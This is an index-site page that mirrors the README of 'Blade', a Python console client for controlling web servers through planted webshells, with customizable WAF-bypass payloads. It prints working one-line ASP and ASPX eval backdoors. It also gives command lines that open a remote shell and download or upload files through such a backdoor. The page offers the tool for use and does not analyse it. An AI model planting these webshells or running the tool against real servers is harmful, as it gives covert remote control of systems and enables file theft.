Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/wonderqs/blade

A webshell connection tool with customized WAF bypass payloads
https://github.com/wonderqs/blade

Last synced: 3 months ago
JSON representation

A webshell connection tool with customized WAF bypass payloads

Host: GitHub
URL: https://github.com/wonderqs/blade
Owner: wonderqs
License: gpl-2.0
Created: 2015-12-03T09:47:33.000Z (almost 9 years ago)
Default Branch: master
Last Pushed: 2018-09-12T08:04:08.000Z (about 6 years ago)
Last Synced: 2024-06-26T06:33:28.636Z (4 months ago)
Language: Python
Homepage:
Size: 30.3 KB
Stars: 125
Watchers: 20
Forks: 29
Open Issues: 0
Metadata Files:
- Readme: README.md
- License: LICENSE

Awesome Lists containing this project

awesome-webshell - **99**星

README

## Blade
Blade is a webshell connection tool based on console, currently under development and aims to be a choice of replacement of Chooper (中国菜刀). Chooper is a very cool webshell client with widly typies of server side scripts supported, but Chooper can only work on Windows opreation system, so this is the motivation of create another "Chooper" supporting Windows, Linux & Mac OS X. Blade is based on Python, so it allows users to modify the webshell connection payloads so that Blade can bypass some specified WAF which Chooper can not.
## Major functions
Manage a web server with only one-line code on it, just like:

PHP, ASP, ASPX & JSP supported.

Terminal Console provided.

File management & Dadabase management.
## Features
Cross-plaform supported (Python needed)

Customizable WAF bypass payloads

Compatible with Chooper's server side scripts
## Server side scripts examples
PHP:

ASP:
<%eval request("cmd")%>

ASPX:
<%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%>
## Usage
Get a shell:

python blade.py -u http://localhost/shell.php -s php -p cmd --shell

Get a shell with longer timeout (i.e. for windows):

python blade.py -u http://localhost/shell.aspx -s asp -p cmd --shell -t 60

Download a file:

python blade.py -u http://localhost/shell.php -s php -p cmd --pull remote_path local_path

Upload a file:

python blade.py -u http://localhost/shell.php -s php -p cmd --push local_path remote_path
## Current issues
Server side scripts supporting is not completed, currently support PHP, ASP and ASPX
ASPX file upload/download is still under development

Database management function is not completed, so can not connect databases

## TODO
Implment JSP

Fix file handling

## Future developent
Beacuse I am busy sometimes, the progress of development may be a bit slow. If anyone intrest this project, welcome fork!